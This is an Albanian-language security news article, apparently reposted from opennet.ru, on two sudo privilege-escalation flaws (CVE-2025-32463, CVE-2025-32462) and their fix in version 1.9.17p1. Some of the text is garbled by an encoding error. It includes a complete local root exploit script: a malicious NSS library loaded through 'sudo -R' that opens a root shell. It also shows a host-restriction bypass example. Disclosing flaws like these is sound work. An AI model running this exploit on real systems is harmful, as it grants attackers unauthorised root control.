Vulnerabilitetet në utilitarin sudo, që lejon marrjen e të drejtave root në sistem

Në paketën sudo, e cila përdoret për të organizuar ekzekutimin e komandeve në emër të përdoruesve të tjerë, është zbuluar një vulnerabilitet (CVE-2025-32463) që lejon çdo përdorues të pacertifikuar të ekzekutojë kod me të drejtat e root, edhe nëse përdoruesi nuk përmendet në konfiguracionin sudoers. Distribucione të prekura përfshijnë ato që përdorin skedarin e konfigurimit /etc/nsswitch.conf, për shembull, mundësia e shfrytëzimit të këtij vulnerabiliteti është demonstruar në Ubuntu 24.04 dhe Fedora 41.

Vulnerabiliteti manifeston në konfigurimin e paracaktuar dhe është konfirmuar në versionet e sudo nga 1.9.14 deri në 1.9.17 (potencialisht ndikon në të gjitha versionet që fillojnë nga 1.8.33). Problemi është zgjidhur në përditësimin sudo 1.9.17p1. Mund të kontrolloni statusin e versionit të ri të paketës ose përgatitjen e patches në distribucionet në faqet e mëposhtme (nëse faqja nuk është e qasshme, atëherë zhvilluesit e distribucionit nuk kanë filluar ende shqyrtimin e problemit): Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Gentoo dhe Arch (1, 2).

Problemi shkaktohet nga fakti se kur pĂ«rdoret opsioni "-R" ("—chroot") pĂ«r tĂ« ekzekutuar komanda nĂ« njĂ« ambient chroot me njĂ« pĂ«rdorues tĂ« zgjedhur si katalogun rrĂ«njĂ«sor, skedari /etc/nsswitch.conf ngarkohej nĂ« kontekstin e katalogun tĂ« ri rrĂ«njĂ«sor, jo nĂ« atĂ« sistemor. Duke qenĂ« se pĂ«rdoruesi mund tĂ« pĂ«rdorĂ« katalogun e tij si katalog rrĂ«njĂ« pĂ«r chroot, ai mund ta vendosĂ« skedarin e konfigurimit nsswitch.conf atje. Duke kontrolluar skedarin e ngarkuar nga nssswitch (Name Service Switch), pĂ«rdoruesi mund tĂ« shtojĂ« nĂ« tĂ« konfigurime qĂ« çojnĂ« nĂ« thirrjen e menaxherĂ«ve tĂ« tjerĂ«. MenaxherĂ«t e tillĂ« ngarkohen nga NSS nĂ« formĂ«n e bibliotekave tĂ« ndara, tĂ« cilat gjithashtu mund tĂ« vendosen nĂ« katalogun e kontrolluar nga pĂ«rdoruesi. Duke futur bibliotekĂ«n e tij, pĂ«rdoruesi mund tĂ« arrijĂ« tĂ« ekzekutojĂ« kod nga ajo me tĂ« drejtat e root, pasi pĂ«rpunimi NSS bĂ«het para heqjes sĂ« privilegjeve.

Shembulli i exploit-it: #!/bin/bash STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX) cd ${STAGE?} || exit 1 cat > woot1337.c<<EOF #include #include __attribute__((constructor)) void woot(void) { setreuid(0,0); setregid(0,0); chdir("/"); execl("/bin/bash", "/bin/bash", NULL); } EOF mkdir -p woot/etc libnss_ echo "passwd: /woot1337" > woot/etc/nsswitch.conf cp /etc/group woot/etc gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c echo "woot!" sudo -R woot woot rm -rf ${STAGE?}

NĂ« versionin sudo 1.9.17p1 Ă«shtĂ« zgjidhur gjithashtu njĂ« vulnerabilitet tjetĂ«r (CVE-2025-32462), qĂ« lejon ekzekutimin e komandeve me tĂ« drejtat e root, por qĂ« manifeston vetĂ«m nĂ« konfigurimet sudoers, ku parametri "host" Ă«shtĂ« vendosur ndryshe nga ALL ose emri aktual i hostit. Vulnerabiliteti Ă«shtĂ« shkaktuar nga njĂ« gabim, qĂ« bĂ«nte tĂ« mundur qĂ« opsioni "-h" ("—host") tĂ« vepronte jo vetĂ«m nĂ« kombinim me opsionin "-l" ("—list") pĂ«r tĂ« shfaqur privilegjet e lidhura me hostin, por gjithashtu gjatĂ« ekzekutimit tĂ« komandeve. Si rezultat, pĂ«rdoruesi mund tĂ« specifikonte gjatĂ« thirrjes sudo çdo host dhe tĂ« kalonte kufizimet e rregullave sudoers, tĂ« lidhura me emrin e hostit.

Për të realizuar një sulm, përdoruesi duhet të përmendet në sudoers, për shembull, nëse në cilësimet është caktuar "testuser testhost = ALL", atëherë përdoruesi "testuser" mund të spesifikojë "sudo -h testhost" dhe të ekzekutojë komande me të drejtat e root në çdo host, dhe jo vetëm në hostin testhost. Konfigurime të tilla si "testuser ALL = ALL" ose pa rregulla të qarta për përdoruesin e veçantë nuk janë të prekura nga vulnerabilitetet.

Burimi: opennet.ru

Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster